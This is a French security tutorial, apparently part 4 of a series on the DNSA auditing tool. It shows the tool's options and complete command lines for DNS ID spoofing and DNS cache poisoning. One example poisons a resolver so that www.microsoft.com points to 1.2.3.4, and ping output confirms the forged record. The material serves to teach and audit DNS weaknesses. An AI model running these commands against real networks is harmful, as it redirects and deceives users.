|
|
[DNS Auditing Tool – Partie 4] Utilisation de DNSA
Par Rédaction,
secuobs.com
Le 19/12/2007
Résumé : Description de l'exploitation, avec DNSA, des attaques présentées en partie 2 du dossier "DNS Auditing Tool". Les exemples d'exploitation avec DNSA sont disponibles en version Ethernet et en version WIFI. - Lire l'article
Présentation générale :
Usage: ./dnsa-ng [OPTIONS]
DNS Swiss knife tool
REQUIRED : -m [mode] where mode can be raw4 or link (depending of your network topology)
REQUIRED : -t [media] where media can be 'wifi' or 'ether'
* 'wifi' : needs 2 cards as describe in the documentation, needs the -I option to specify the interface which will inject packets
* 'ether' : doesn't need further options)
-1 DNS ID spoofing [ Required : -S ]
-D [www.domain.org] Hostname query to fool.
Don't use it if every DNS request sniffed has to be spoofed
-S [IP] IP address to send for DNS queries
-s [IP] IP address of the host to fool
-i [interface] IP address to send for DNS queries
-2 DNS IDs Sniffing [ Required : -s ] (Beta and not finished)
-s [IP] IP address of the server which makes queries
-w [file] Output file for DNS IDs
-3 DNS cache poisoning [ Required : -S AND -a AND -b]
-a [host.domain.org] Hostname to send in the additional record
-b [IP] IP to send in the additional record
-D [www.domain.org] Hostname for query. Use it if you want to fool just one
-S [IP] IP address to send for DNS queries (the normal one)
-s [IP] IP address of the server to fool
-i [interface] IP address to send for DNS queries
-h Print usage
Bug reports to Pierre Betouin
Utilisation :
Le mode « -1 » concerne les attaques par DNS ID Spoofing :
Utilisation Ethernet
./dnsa-ng -m [raw4 ou link] -1 -D [NOM DE DOMAINE OU DE MACHINE] -S IP_A_ENVOYER -s CLIENT_A_LEURRER -i INTERFACE -t ether
Les arguments « -S » et « -s » sont donc des filtres permettant d’affiner les restrictions des clients à attaquer. S’ils ne sont pas spécifiés, toutes les requêtes DNS seront concernées.
Utilisation WiFi :
./dnsa-ng -m [raw4 ou link] -1 -D [NOM DE DOMAINE OU DE MACHINE] -S IP_A_ENVOYER -s CLIENT_A_LEURRER -i ath0 -t wifi -I wlan0
L’utilisation en WiFi est la même, à la spécification des interfaces près. Dans le mode WiFi, une interface capture le trafic brut et une autre se charge d’injecter le trafic. L’interface « -i » capture le trafic passivement tandis que l’interface « -I » injecte les paquets forgés. Le mode « -3 » concerne les attaques de DNS cache poisoning décrites plus haut, la commande générique de cette attaque est la suivante :
./dnsa-ng -t ether -m [raw4 ou link] -3 -D [HOTE RECHERCHE] -S [IP LEGITIME DE L’HOTE] -s [SERVEUR DNS EFFECUANT LA REQUETE] -a [ADDRR A AJOUTER] -b [IP DE L’ADDRR A AJOUTER] -i [INTERFACE]
L’exemple suivant concerne une requête effectuée sur le domaine pirate.org à la recherche du nom d’hôte « hacker » ayant pour IP 100.101.102.103. Le serveur DNS effectuant la recherche est le serveur 192.168.1.100. L’enregistrement additionnel concerne le FQDN www.microsoft.com en lui affectant l’IP 1.2.3.4. L’interface d’injection est la carte réseau eth0.
./dnsa-ng -t ether -m [raw4 or link] -3 -D hacker.pirate.org -S 100.101.102.103 –s 192.168.1.100 -a www.microsoft.com -b 1.2.3.4 -i eth0
Après corruption du cache DNS, nous pouvons constater que le serveur a mis en cache l’information forgée :
$ ping www.microsoft.com
PING www.microsoft.com (1.2.3.4): 56 data bytes
Autres ressources dans ce dossier :
[DNS Auditing Tool – Partie 1] Introduction à la sécurité du protocole DNS – lien
[DNS Auditing Tool – Partie 2] Mises en évidence des failles DNS – lien
[DNS Auditing Tool – Partie 3] Installation et configuration de DNSA – lien
[DNS Auditing Tool – Partie 5] Conclusion et webographie – lien
- Article suivant : [DNS Auditing Tool – Partie 5] Conclusion et webographie
- Article précédent : [DNS Auditing Tool – Partie 3] Installation et configuration de DNSA
- Article suivant dans la catégorie Tutoriels : [DNS Auditing Tool – Partie 5] Conclusion et webographie
- Article précédent dans la catégorie Tutoriels : [DNS Auditing Tool – Partie 3] Installation et configuration de DNSA
| Mini-Tagwall des articles publiés sur SecuObs : | | | | sécurité, exploit, windows, outil, attaque, réseau, microsoft, metasploit, audit, vulnérabilité, système, virus, internet, usbsploit, données, protocol, présentation, linux, source, réseaux, bluetooth, scanner, reverse, conférence, shell, meterpreter, vista, rootkit, engineering, mobile, security, wishmaster, malicieux, https, trames, paquet, noyau, téléphone, détection, botnet, forensic, libre, snort, utilisant, sysun |
| Mini-Tagwall de l'annuaire video : | | | | curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit, exploit, lockpicking, linux, attack, wireshark, vmware, rootkit, conference, network, shmoocon, backtrack, virus, conficker, elcom, etter, elcomsoft, server, meterpreter, openvpn, ettercap, openbs, iphone, shell, openbsd, iptables, securitytube, deepsec, source, office, systm, openssh, radio |
| Mini-Tagwall des articles de la revue de presse : | | | | security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité |
| Mini-Tagwall des Tweets de la revue Twitter : | | | | security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack |
|
|
|
|
|
